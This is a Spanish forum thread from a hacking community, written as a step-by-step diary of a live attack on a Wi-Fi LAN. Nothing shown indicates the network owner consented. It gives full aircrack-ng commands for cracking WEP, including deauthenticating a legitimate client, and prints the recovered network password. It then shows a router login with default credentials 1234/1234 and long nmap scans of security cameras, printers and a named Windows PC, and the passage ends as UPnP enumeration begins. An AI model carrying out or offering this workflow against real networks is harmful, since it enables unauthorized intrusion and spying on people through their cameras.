Hack x Crack - Comunidad de Seguridad informática

Seguridad Informatica => Hacking => Mensaje iniciado por: odeveku en Junio 21, 2012, 02:47:28 pm

Título: Diario de un Ataque
Publicado por: odeveku en Junio 21, 2012, 02:47:28 pm
PRÓLOGO

En vista a las respuestas obtenidas en este hilo http://foro.hackxcrack.net/forum/index.php?topic=12351.0 se crea este post en el que se va a analizar y diseccionar un ataque en tiempo real a una red LAN. La idea es que toda la comunidad participe en el ataque aportando sus ideas, conocimientos y métodos para lograr primero comprender y luego comprometer la seguridad de la red. Yo pondré en práctica cada método que propongáis y postearé el resultado con capturas de pantalla etc. El objetivo es documentar y analizar en profundidad el ataque y los métodos empleados en él para que todos podamos beneficiarnos y aprender de ello. Al lío!

ENTRANDO EN LA RED

Sabemos que la red LAN que queremos atacar dispone de un router Wi-Fi con ESSID: WLAN_BE.
Este es el único dato que tenemos por ahora, por lo que centramos nuestro ataque en el AP de la red Wi-Fi con el objetivo de autentificarnos como clientes legítimos de la red.

Corremos Backtrack.

Comenzamos con un monitoreo general de las redes a nuestro alcance para localizar nuestro objetivo. Descubrimos que el AP está emitiendo en el canal 6 y que su dirección MAC es E0:90:53:4A:68:AA. Además averiguamos que la contraseña tiene una encriptación WEP.
Código: [Seleccionar]
airodump-ng wlan0
Monitoreamos el tráfico de la red para capturar IVs que nos permitan crackear la pass con aircrack-ng.
Código: [Seleccionar]
airodump-ng --bssid E0:90:53:4A:68:AA -c 6 -w wlan_be wlan0
Hacemos un ataque de falsa autenticación y nos asociamos con el AP para poder inyectar tráfico.
Código: [Seleccionar]
aireplay-ng -1 0 -a E0:90:53:4A:68:AA -h 00:11:22:33:44:55 -e WLAN_BE wlan0
Comenzamos a analizar paquetes buscando aquellos que contengan una petición de ARP para poder reinyectarlos. Al reinyectarlos provocamos que el AP tenga que emitir otro paquete ARP con un IV nuevo que capturamos con el airodump-ng. Este proceso es un bucle que se repite generando muchisimo tráfico.
Código: [Seleccionar]
aireplay-ng -3 0 -b E0:90:53:4A:68:AA -h 00:11:22:33:44:55 wlan0
Como no encontramos ningún paquete de ARP que reinyectar, lanzamos un ataque de desautenticación a un cliente legítimo para que al volver a autenticarse genere una petición de ARP que podamos capturar y reinyectar.
Código: [Seleccionar]
aireplay-ng -0 10 -a E0:90:53:4A:68:AA -c 9C:8E:99:33:4D:F0 wlan0
Crackeamos el password de la red mediante los IVs obtenidos que hemos guardado en el wlan_be.cap.
Código: [Seleccionar]
aircrack-ng wlan_be.cap
Ya tenemos el password de la red: XE091534A27BE
Nos conectamos a ella como si fuéramos uno más.

TANTEANDO EL TERRENO

Una vez que estamos dentro de la red, hacemos un "reconocimiento del terreno" para saber ante que nos encontramos. Para ello vamos a realizar un escaneo con el Nmap.

Primero ejecutamos el comando:
Código: [Seleccionar]
ifconfig
Esto nos sirve para saber que IP nos ha asignado el servidor DHCP, y así poder deducir en que rango de IPs nos estamos moviendo. Descubrimos que nuestra IP es 192.168.1.129 , por lo tanto sabemos que seguramente el servidor DHCP asigne las IPs dentro del rango 192.168.1.1-255.

Para confirmarlo y hacernos una idea general del mapa de la LAN realizamos un escaneo rápido con Nmap.
Código: [Seleccionar]
nmap -sP 192.168.1.1-255
La opción -sP le indica al Nmap que simplemente compruebe si los hosts estan up or down.

Resultado:
Código: [Seleccionar]
[email protected]:~# nmap -sP 192.168.1.1-255

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-21 15:01 CEST
Nmap scan report for 192.168.1.1
Host is up (0.011s latency).
MAC Address: E0:91:53:4A:27:BE (XAVi Technologies)
Nmap scan report for 192.168.1.10
Host is up (0.033s latency).
MAC Address: 00:1B:11:01:30:95 (D-Link)
Nmap scan report for 192.168.1.13
Host is up (0.0060s latency).
MAC Address: 00:13:46:DB:B7:5C (D-Link)
Nmap scan report for 192.168.1.14
Host is up (0.071s latency).
MAC Address: 00:13:46:DC:2D:60 (D-Link)
Nmap scan report for 192.168.1.15
Host is up (0.54s latency).
MAC Address: 00:1C:F0:78:81:83 (D-Link)
Nmap scan report for 192.168.1.16
Host is up (0.17s latency).
MAC Address: F0:7D:68:05:A6:D0 (D-Link)
Nmap scan report for 192.168.1.17
Host is up (0.17s latency).
MAC Address: F0:7D:68:0A:87:5A (D-Link)
Nmap scan report for 192.168.1.18
Host is up (0.092s latency).
MAC Address: F0:7D:68:0A:87:49 (D-Link)
Nmap scan report for 192.168.1.19
Host is up (0.32s latency).
MAC Address: F0:7D:68:0A:86:C8 (D-Link)
Nmap scan report for 192.168.1.20
Host is up (0.53s latency).
MAC Address: F0:7D:68:0A:85:4B (D-Link)
Nmap scan report for 192.168.1.33
Host is up (0.0037s latency).
MAC Address: 00:26:24:75:5B:6F (Thomson)
Nmap scan report for 192.168.1.34
Host is up (0.0032s latency).
MAC Address: 00:10:DC:E4:EE:C0 (Micro-star International CO.)
Nmap scan report for 192.168.1.36
Host is up (0.0079s latency).
MAC Address: 9C:8E:99:33:4D:F0 (Hewlett-Packard Company)
Nmap scan report for 192.168.1.38
Host is up (0.25s latency).
MAC Address: 00:1F:1F:48:55:80 (Edimax Technology Co.)
Nmap scan report for 192.168.1.129
Host is up.
Nmap done: 255 IP addresses (15 hosts up) scanned in 14.13 seconds

Descubrimos que hay 15 máquinas conectadas mediante la WLAN y confirmamos nuestras sospechas de que el servidor DHCP asigna IPs en el rango 192.168.1.1-255 . Esto ya nos permite esbozar un mapa más o menos aproximado de la red.

La ip 192.168.1.1 corresponde seguramente al AP, osea al router, que parece ser un Xavii.
Vemos un rango de Ips 192.168.1.10-20 que corresponden a aparatos D-Link lo que es bastante llamativo.
Vemos otras IPs correspondientes a varios hosts.
Y por último vemos nuestra IP 192.168.1.129 que la descartamos del análisis.

Una vez que tenemos más o menos claro por donde nos movemos... vamos a ver que pasa con ese router.

EL ROUTER

En el escaneo anterior hemos visto que la IP del router era 192.168.1.1 .Esta vez vamos a realizar un escaneo más a fondo, buscando puerto abiertos, servicios, S.O... Para ello corremos el Nmap con los siguientes parámetros:
Código: [Seleccionar]
[email protected]:~# nmap -sV -A 192.168.1.1

Nmap scan report for 192.168.1.1
Host is up (0.0065s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE    VERSION
21/tcp   open  ftp        Xavi 7768 WAP ftpd 1.00
23/tcp   open  telnet     Zoom X6 ADSL router telnetd
53/tcp   open  tcpwrapped
80/tcp   open  upnp       Conexant-EmWeb 6.1.0 (UPnP 1.0)
2800/tcp open  upnp       Conexant-EmWeb 6.1.0 (UPnP 1.0)
8008/tcp open  upnp       Conexant-EmWeb 6.1.0 (UPnP 1.0)
MAC Address: E0:91:53:4A:27:BE (XAVi Technologies)
Device type: broadband router|WAP
Running: Allied Data embedded, Belkin embedded, Intracom embedded, Iskratel embedded
OS details: Broadband router (Allied Data CopperJet, Belkin F5D7632-4, Intracom Jetspeed 500i, or Iskratel Sinope568 or Proteus932)
Network Distance: 1 hop
Service Info: Devices: WAP, broadband router

TRACEROUTE
HOP RTT     ADDRESS
1   6.45 ms 192.168.1.1

Vemos que entre otras cosas en el campo del ftp el nmap nos dice que se trata del modelo Xavii 7768. Esto es una aproximación y seguramente no sea totalmente cierto, pero nos sirve.
Buscamos la documentación del router Xavii 7768 en internet http://www.adslayuda.com/xavi7768-cambiar_clave_acceso.html y vemos que el usuario y el password por defecto del router son 1234 y 1234 respectivamente. Es muy probable que no los hayan cambiado así que por probar que no quede.

Efectivamente no lo han cambiado. Ui, parece que alguien se ha dejado la puerta abierta...
(http://img707.imageshack.us/img707/8495/routeroverview.png)

Comprobamos que como habíamos supuesto antes no se trata del modelo Xavii 7768, sino del 7968 plus.
Y de repente en la pestaña de redireccionamiento de puertos...

(http://img515.imageshack.us/img515/853/portforwardingp.png)

BANG! Acabamos de descubrir que eran todos esos aparatos D-Link. Tenemos 9 cámaras con sus correspondientes IPs. Esto empieza a ponerse interesante...
Además sabemos que alguien se conecta a ellas desde el exterior de la red, ya que no tendría sentido haber configurado un NAT si no vas a acceder desde fuera del router.

Personalmente ODIO las interfaces http de los routers, me parece todo una maraña de opciones y pestañas, así que vamos a conectarnos al router por telnet para tener una consola con todas las opciones ordenaditas en blanco sobre negro...  8)

Código: [Seleccionar]
[email protected]:~# telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.

                ,vvvdP9P???^   ,,,
              vvd###P^`^         vvvvv v
         vv#####?^                  ????####vv,
      vv####??     ,vvvdP???^  ,,,        ??##^
     v#####?    ,vvd##P?^        #?#v#vvv
   v#####?    v###P^    ,vvv,        '?#?,
  ######?   ####?^ ,vd#P?^     `???##
  #####?   v####  ,d##P^           ''
 ######   v####  ]###L                   _   _          _                  ___
 #####?   v####  ]##L                   /   / \  |\ |  |_  \/   /\   |\ |   |
 ######    ####  ]###L                  \_  \_/  | \|  |_  /\  /--\  | \|   |
 ?#####v   ####v  ]##h,            ,,
  ?#####    ?###h,  `9#hv,     ,vv###
    ######    #####L    ]###L        ,v#v'
    ?#####vv    ?9##hv,        ,,vvvv###'
       ?#####vv     `??9P\vv,   ^         vv##,
          ######                       #######L
            ??###hvv,          ,vvv#?##?????
                `????9hdhvv,

Login: 1234
Password: ****

Login successful

-->
802.1x           802.1x port based authentication
acl              snmp remote management
agent            Get a file from a remote host
ald              Configuration commands for ald
bridge           Configure layer 2 bridge
classifier       Packet classifier configuration commands
console          Console access
dhcpclient       DHCP client configuration commands
dhcpserver       DHCP server configuration commands
dnsclient        DNS client configuration commands
dnsrelay         DNS relay configuration
emux             Ethernet Switch Multiplex configuration commands
ethernet         Commands to configure ethernet transports
firewall         Firewall configuration commands
fullConeNat      Full Cone NAT configuration commands
help             Top level CLI help
igmp             igmp configuration commands
imdebug          Directly access the information model
ip               Configure IP router
lan             
logger           Log to a remote host using syslog
meter            Packet metering configuration command
nat              NAT configuration commands
port             Physical port configuration commands
pppoa            PPP over ATM configuration
pppoe            PPP over Ethernet Configuration
reboot           reboot modem
restore_defaults set all configuration to factory setting
rfc1483          Commands to configure RFC1483 transports
save_and_exit    SAVES changes closing telnet session
save_and_reboot  SAVES changes and reboots modem.
save_config      Save configuration
scheduler        Configuration commands for scheduler
security         Security configuration commands not specific to NAT or firewall
simpleconfig     SimpleConfig Configuration commands
sntpclient       Simple Network Time Protocol Client commands
stop             
system           System administration commands
transports       Transport configuration commands
upnp             UPnP configuration commands
user             User commands
wanacl           snmp remote management
webserver        Webserver configuration commands
wpa              Configure WPA (Wireless Protected Access)
zipb             Configure Dynamic ZIPB mode
-->

Vaya... parece que se pueden hacer un par de cosas...
Pasemos a las camaras!

CAMARAS

Cuando intentamos acceder a alguna de las camaras por el puerto designado en la tabla del NAT se abre una ventana como esta solicitandonos un user y una pass.

(http://img593.imageshack.us/img593/8753/camara2.png)

Al no introducirla correctamente nos redirige a la siguiente pagina:

(http://img406.imageshack.us/img406/162/protectedobject.png)

El siguiente paso es realizar un escaneo completo de las cámaras con Nmap.

CAMARA 1 IP 192.168.1.12

Según parece esta camara está offline, esto puede deberse a muchos motivos, que se estropeara, que la quitaran por decisión propia... La descartamos.

CAMARA 2 IP 192.168.1.13

Código: [Seleccionar]
Starting Nmap 5.61TEST4

Nmap scan report for 192.168.1.13
Host is up (0.0076s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     GNU Inetutils FTPd 1.4.2
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
554/tcp  open  rtsp?
| rtsp-methods:
|_  OPTIONS, DESCRIBE, PLAY, SETUP, TEARDOWN
1501/tcp open  sas-3?
MAC Address: 00:13:46:DB:B7:5C (D-Link)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:kernel:2.4
OS details: Linux 2.4.18 - 2.4.35 (likely embedded)
Network Distance: 1 hop
Service Info: Host: Network-Camera

TRACEROUTE
HOP RTT     ADDRESS
1   7.56 ms 192.168.1.13

CAMARA 3 IP 192.168.1.14

Código: [Seleccionar]
[email protected]:~# nmap -sV -A 192.168.1.14

Starting Nmap 5.61TEST4
Nmap scan report for 192.168.1.14
Host is up (0.28s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
21/tcp  open  ftp     GNU Inetutils FTPd 1.4.2
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
23/tcp  open  telnet  Openwall GNU/*/Linux telnetd
554/tcp open  rtsp?
| rtsp-methods:
|_  OPTIONS, DESCRIBE, PLAY, SETUP, TEARDOWN
MAC Address: 00:13:46:DC:2D:60 (D-Link)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:kernel:2.4
OS details: Linux 2.4.18 - 2.4.35 (likely embedded)
Network Distance: 1 hop
Service Info: Host: Network-Camera; OS: Linux

TRACEROUTE
HOP RTT       ADDRESS
1   281.05 ms 192.168.1.14


CAMARA 4 IP 192.168.1.15

Código: [Seleccionar]
[email protected]:~# nmap -sV -A 192.168.1.15

Starting Nmap 5.61TEST4
Nmap scan report for 192.168.1.15
Host is up (0.11s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE   VERSION
21/tcp   open  ftp       GNU Inetutils FTPd 1.4.2
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
23/tcp   open  telnet    Openwall GNU/*/Linux telnetd
554/tcp  open  rtsp?
| rtsp-methods:
|_  OPTIONS, DESCRIBE, PLAY, SETUP, TEARDOWN
1503/tcp open  imtc-mcs?
MAC Address: 00:1C:F0:78:81:83 (D-Link)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:kernel:2.4
OS details: Linux 2.4.18 - 2.4.35 (likely embedded)
Network Distance: 1 hop
Service Info: Host: Network-Camera; OS: Linux

TRACEROUTE
HOP RTT       ADDRESS
1   113.45 ms 192.168.1.15

CAMARA 5 IP 192.168.1.16

Código: [Seleccionar]
[email protected]:~# nmap -sV -A 192.168.1.16

Starting Nmap 5.61TEST4
Nmap scan report for 192.168.1.16
Host is up (0.27s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE  VERSION
21/tcp  open  ftp?
443/tcp open  ssl/http GoAhead-Webs embedded httpd
| ssl-cert: Subject: organizationName=D-LINK/stateOrProvinceName=Taiwan/countryName=TW
| Not valid before: 2010-02-05 08:14:40
|_Not valid after:  2015-02-04 08:14:40
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
| http-title: Document Error: Unauthorized
|_Requested resource was https://192.168.1.16:443/home.htm
MAC Address: F0:7D:68:05:A6:D0 (D-Link)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.13 - 2.6.31
Network Distance: 1 hop

TRACEROUTE
HOP RTT       ADDRESS
1   271.54 ms 192.168.1.16

CAMARA 6 IP 192.168.1.17

Código: [Seleccionar]
[email protected]:~# nmap -sV -A 192.168.1.17

Starting Nmap 5.61TEST4
Nmap scan report for 192.168.1.17
Host is up (0.34s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE  VERSION
21/tcp  open  ftp?
443/tcp open  ssl/http GoAhead-Webs embedded httpd
| ssl-cert: Subject: organizationName=D-LINK/stateOrProvinceName=Taiwan/countryName=TW
| Not valid before: 2010-02-05 08:14:40
|_Not valid after:  2015-02-04 08:14:40
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
| http-title: Document Error: Unauthorized
|_Requested resource was https://192.168.1.17:443/home.htm
MAC Address: F0:7D:68:0A:87:5A (D-Link)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.13 - 2.6.31
Network Distance: 1 hop

TRACEROUTE
HOP RTT       ADDRESS
1   336.91 ms 192.168.1.17

CAMARA 7 IP 192.168.1.18

Código: [Seleccionar]
nmap -sV -A 192.168.1.18

Starting Nmap 5.61TEST4 ( http://nmap.org )
Nmap scan report for 192.168.1.18
Host is up (0.34s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE  VERSION
21/tcp  open  ftp?
443/tcp open  ssl/http GoAhead-Webs embedded httpd
| ssl-cert: Subject: organizationName=D-LINK/stateOrProvinceName=Taiwan/countryName=TW
| Not valid before: 2010-02-05 08:14:40
|_Not valid after:  2015-02-04 08:14:40
|_http-title: Requested resource was https://192.168.1.18:443/home.htm and no page was returned.
MAC Address: F0:7D:68:0A:87:49 (D-Link)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.13 - 2.6.31
Network Distance: 1 hop

TRACEROUTE
HOP RTT       ADDRESS
1   338.75 ms 192.168.1.18

CAMARA 8 IP 192.168.1.19

Código: [Seleccionar]
[email protected]:~# nmap -sV -A 192.168.1.19

Starting Nmap 5.61TEST4
Nmap scan report for 192.168.1.19
Host is up (0.66s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE  VERSION
21/tcp  open  ftp?
443/tcp open  ssl/http GoAhead-Webs embedded httpd
| ssl-cert: Subject: organizationName=D-LINK/stateOrProvinceName=Taiwan/countryName=TW
| Not valid before: 2010-02-05 08:14:40
|_Not valid after:  2015-02-04 08:14:40
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
| http-title: Document Error: Unauthorized
|_Requested resource was https://192.168.1.19:443/home.htm
MAC Address: F0:7D:68:0A:86:C8 (D-Link)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.13 - 2.6.31
Network Distance: 1 hop

TRACEROUTE
HOP RTT       ADDRESS
1   655.43 ms 192.168.1.19

CAMARA 9 IP 192.168.1.20

Código: [Seleccionar]
[email protected]:~# nmap -sV -A 192.168.1.20

Starting Nmap 5.61TEST4
Nmap scan report for 192.168.1.20
Host is up (0.36s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE  VERSION
21/tcp  open  ftp?
443/tcp open  ssl/http GoAhead-Webs embedded httpd
| ssl-cert: Subject: organizationName=D-LINK/stateOrProvinceName=Taiwan/countryName=TW
| Not valid before: 2010-02-05 08:14:40
|_Not valid after:  2015-02-04 08:14:40
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
| http-title: Document Error: Unauthorized
|_Requested resource was https://192.168.1.20:443/home.htm
MAC Address: F0:7D:68:0A:85:4B (D-Link)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.13 - 2.6.31
Network Distance: 1 hop

TRACEROUTE
HOP RTT       ADDRESS
1   360.67 ms 192.168.1.20

Una vez escaneadas las camaras escaneamos el resto de IPs para hacernos una idea de que otros equipos hay en la WLAN.

192.168.1.33 IMPRESORA HP

Código: [Seleccionar]
[email protected]:~# nmap -sV -A 192.168.1.33

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-21 20:10 CEST
Nmap scan report for 192.168.1.33
Host is up (0.0045s latency).
Not shown: 987 closed ports
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Virata-EmWeb 6.2.1
|_http-title: HP Photosmart Wireless B109n-z
139/tcp  open  tcpwrapped
445/tcp  open  netbios-ssn
6839/tcp open  tcpwrapped
7435/tcp open  tcpwrapped
8080/tcp open  http-proxy?
|_http-methods: No Allow or Public header in OPTIONS response (status code 404)
9100/tcp open  jetdirect?
9101/tcp open  jetdirect?
9102/tcp open  jetdirect?
9110/tcp open  unknown
9220/tcp open  hp-gsg      HP Generic Scan Gateway 1.0
9290/tcp open  hp-gsg      IEEE 1284.4 scan peripheral gateway
9500/tcp open  ismserver?
MAC Address: F4:CE:46:EE:2C:E2 (Hewlett-Packard Company)
Device type: printer
Running: HP embedded
OS details: HP PhotoSmart C390 or C4780, or Officejet 7000 printer, HP printer: Photosmart 4300-, 6500-, 7200-, or 8100-series, or Officejet 6000-series
Network Distance: 1 hop
Service Info: Device: printer

Host script results:
|_nbstat: NetBIOS name: HPF4CE46EE2CE2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>

TRACEROUTE
HOP RTT     ADDRESS
1   4.55 ms 192.168.1.33

192.168.1.34 PC

Código: [Seleccionar]
[email protected]:~# nmap -sV -A 192.168.1.34

Starting Nmap 5.61TEST4
Nmap scan report for 192.168.1.34
Host is up (0.0029s latency).
Not shown: 990 filtered ports
PORT     STATE  SERVICE      VERSION
21/tcp   open   tcpwrapped
139/tcp  open   netbios-ssn
427/tcp  closed svrloc
445/tcp  open   microsoft-ds Microsoft Windows XP microsoft-ds
700/tcp  open   tcpwrapped
1073/tcp open   tcpwrapped
2869/tcp open   http         Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
6000/tcp open   X11?
8000/tcp open   http-alt?
8001/tcp open   vcom-tunnel?
MAC Address: 00:10:DC:E4:EE:C0 (Micro-star International CO.)
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP|2003|2000 (98%)
OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows XP Professional SP2 (firewall enabled) (98%), Microsoft Windows Small Business Server 2003 (98%), Microsoft Windows XP SP2 (94%), Microsoft Windows 2000 SP4 (93%), Microsoft Windows XP SP3 (93%), Microsoft Windows XP Embedded SP2 (92%), Microsoft Windows XP SP2 or SP3 (92%), Microsoft Windows Server 2003 SP0 or Windows XP SP2 (91%), Microsoft Windows Server 2003 SP1 - SP2 (90%), Microsoft Windows Server 2003 SP1 or SP2 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: JACOBO, NetBIOS user: <unknown>, NetBIOS MAC: 00:10:dc:e4:ee:c0 (Micro-star International CO.)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Computer name: Jacobo
|   NetBIOS computer name: JACOBO
|   Workgroup: DEVO
|_  System time: 2012-06-21 21:22:21 UTC+1

TRACEROUTE
HOP RTT     ADDRESS
1   2.94 ms 192.168.1.34

192.168.1.36 IMPRESORA HP

Código: [Seleccionar]
[email protected]:~# nmap -sV -A 192.168.1.36

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-21 20:43 CEST
Nmap scan report for 192.168.1.36
Host is up (0.033s latency).
Not shown: 985 closed ports
PORT     STATE SERVICE           VERSION
80/tcp   open  http?
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
139/tcp  open  tcpwrapped
445/tcp  open  netbios-ssn
631/tcp  open  ipp?
|_http-methods: No Allow or Public header in OPTIONS response (status code 404)
6839/tcp open  tcpwrapped
7435/tcp open  tcpwrapped
8080/tcp open  http-proxy?
9100/tcp open  jetdirect?
9101/tcp open  jetdirect?
9102/tcp open  jetdirect?
9110/tcp open  unknown
9111/tcp open  DragonIDSConsole?
9220/tcp open  hp-gsg            HP Generic Scan Gateway 1.0
9290/tcp open  hp-gsg            IEEE 1284.4 scan peripheral gateway
9500/tcp open  ismserver?
MAC Address: 9C:8E:99:33:4D:F0 (Hewlett-Packard Company)
Device type: printer|power-device
Running: HP embedded, HP VxWorks, MGE embedded
OS CPE: cpe:/o:hp:vxworks
OS details: HP LaserJet CM1312 or Photosmart C510a printer, VxWorks: HP printer or MGE MX 5000 RT UPS
Network Distance: 1 hop
Service Info: Device: printer

Host script results:
|_nbstat: NetBIOS name: HP9C8E99334DF0, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>

TRACEROUTE
HOP RTT      ADDRESS
1   33.32 ms 192.168.1.36

192.168.1.38

Esta IP no tengo ni la más mínima idea de a que podría pertenecer.

Código: [Seleccionar]
nmap -sV -A 192.168.1.38

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-21 20:55 CEST
Nmap scan report for 192.168.1.38
Host is up (0.49s latency).
Not shown: 998 filtered ports
PORT     STATE  SERVICE VERSION
2869/tcp closed icslap
2968/tcp open   enpp?
MAC Address: 00:1F:1F:48:55:80 (Edimax Technology Co.)
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows XP|98|2000|NT|2003|PocketPC/CE (94%), HTC Windows PocketPC/CE (91%), Sony Ericsson Symbian OS 9.X (88%), Ness embedded (87%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_98 cpe:/o:htc:windows_ce cpe:/o:microsoft:windows_2000::sp1 cpe:/o:microsoft:windows_nt cpe:/o:microsoft:windows_server_2003 cpe:/o:sonyericsson:symbian_os:9 cpe:/o:microsoft:windows_ce
Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows 98 SE (92%), Microsoft Windows XP SP2 (91%), HTC Touch mobile phone (Windows Mobile 6) (91%), Microsoft Windows 98 (91%), Microsoft Windows XP Home SP2 (91%), Microsoft Windows XP Professional SP2 (91%), Microsoft Windows XP SP2 or SP3 (91%), Microsoft Windows 2000 SP1 (90%), Microsoft Windows NT 4.0 SP5 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

TRACEROUTE
HOP RTT       ADDRESS
1   486.83 ms 192.168.1.38

Observamos que la MAC del host pertenece a Edimax Technology Co. http://www.edimax.es/es/index.php Basta una búsqueda en internet para averiguar que es una empresa que se dedica a la fabricación de dispositivos Wireless, entre ellos cámaras Wireless. Será otra cámara?

IP 192.168.1.10 ¿OTRO ROUTER?

Código: [Seleccionar]
nmap -sV -A 192.168.1.10

Starting Nmap 5.61TEST4
Nmap scan report for 192.168.1.10
Host is up (0.0072s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE    VERSION
22/tcp  open  tcpwrapped
23/tcp  open  telnet     D-Link Access Point telnetd
80/tcp  open  tcpwrapped
443/tcp open  tcpwrapped
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=HsinChu/countryName=TW
| Not valid before: 2004-07-12 09:02:20
|_Not valid after:  2024-07-12 09:02:20
| http-methods: Potentially risky methods: PUT
|_See http://nmap.org/nsedoc/scripts/http-methods.html
MAC Address: 00:1B:11:01:30:95 (D-Link)
OS details: WAP (Cisco Aironet 1010, D-Link DWL-2100AP or DWL-3200AP, Linksys WAP51AB or WAP55AG, Netgear WPN824, or Proxim ORiNOCO AP-4000M), Lights-Out remote server management, or ReplayTV 5500 DVR, Enterasys Matrix C1 switch or HP LaserJet 3600 printer
Network Distance: 1 hop
Service Info: Device: router

TRACEROUTE
HOP RTT     ADDRESS
1   7.18 ms 192.168.1.10

Los resultados que obtenemos para esta IP son bastante interesantes, ya que según Nmap parace que nos encontramos frente a otro router. Esto rompería los esquemas que nos habíamos hecho en un principio sobre la composición de la red.

ETHERAPE

Para entender mejor como funciona la red y que hosts se comunican entre sí ejecutamos el Etherape.
Etherape es un programa que básicamente sirve para mapear el recorrido que siguen las comunicaciones en la red para así poder hacernos una idea de la estructura de la misma.

Esto es lo que obtenemos tras un rato ejecutando etherape:
(http://img806.imageshack.us/img806/3879/sinttulo1xw.png)

Como se puede ver parece que la IP 239.255.255.250 se comunica constantemente con las IPs de las camaras de seguridad. Esto llama la atención, primero porque en nuestro primer escaneo con Nmap no habíamos detectado ese host, lo que hace pensar que se trata de un host externo a la red (más adelante veremos que esto no es así). Ejecutamos Nmap para intentar escanearlo.

Código: [Seleccionar]
[email protected]:~# nmap 239.255.255.250

Starting Nmap 5.61TEST4
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 0.44 seconds

Efectivamente nos da como resultado host down.
Probamos con algo diferente, vamos a realizar un ping a la IP mientras corremos el Etherape para mapear el recorrido de los paquetes.

Esto es lo que obtenemos con Etherape+Ping:
(http://img696.imageshack.us/img696/7058/60406898.png)
(http://img28.imageshack.us/img28/2589/sinttulo1fer.png)

IP 239.255.255.250 MULTIDIFUSIÓN UPnP

Como podemos ver, nosotros estamos mandando paquetes solamente a la IP 239.255.255.250 pero recibimos paquetes de respuesta de las IPs 192.168.1.1 192.168.1.13 192.168.1.14 192.168.1.15 . Esto significa que la IP 239.255.255.250 reenvía nuestros "paquetes de ping" a esas IPs, como puede verse en el mapeado de Etherape. Otro dato interesante es que en algunos paquetes aparece "DUP!", esto quiere decir que el paquete está duplicado, lo que nos indica que nos llegan varias respuestas iguales desde diferentes direcciones, osea, que el paquete que les llega a todos los hosts es el mismo paquete que nosotros envíamos a 239.255.255.250, por eso nos llegan respuestas repetidas.

Si investigamos un poco en internet http://sanmaikelnews.comze.com/?p=66, descubrimos que la ip 239.255.255.250 es una dirección de multidifusión utilizada por el protocolo UPnP. Los dispositivos que ofrecen servicios UPnP envian periódicamente NOTIFICACIONES SSDP al 239.255.255.250:1900, anunciandose a los clientes que están escuchando. Una NOTIFICACION SSDP contiene una cabecera de ‘Localización’ donde especifica la ubicación de un archivo XML. Este archivo XML contiene datos que indican, entre otras cosas, el tipo (s) de dispositivo UPnP y los servicios soportados por el host, así como rutas adicionales a otros documentos XML que describen los diversos servicios en detalle. Del mismo modo, los clientes UPnP pueden enviar requerimientos SSDP M-SEARCH al 239.255.255.250:1900 para ver si alguno de los dispositivos UPnP responde.

MIRANDA

Auditar dispositivos UPnP de manera manual es un proceso que requiere mucho tiempo y dedicación. Miranda es un script escrito en python que nos permite automatizar y acelerar considerablemente todo este proceso.

Su localización en la suite de backtrack es:
Código: [Seleccionar]
/pentest/enumeration/miranda
Corremos el script miranda.py

Lo primero que necesitamos es encontrar los hosts UPnP que existen en nuestra red:
Código: [Seleccionar]
upnp> msearch

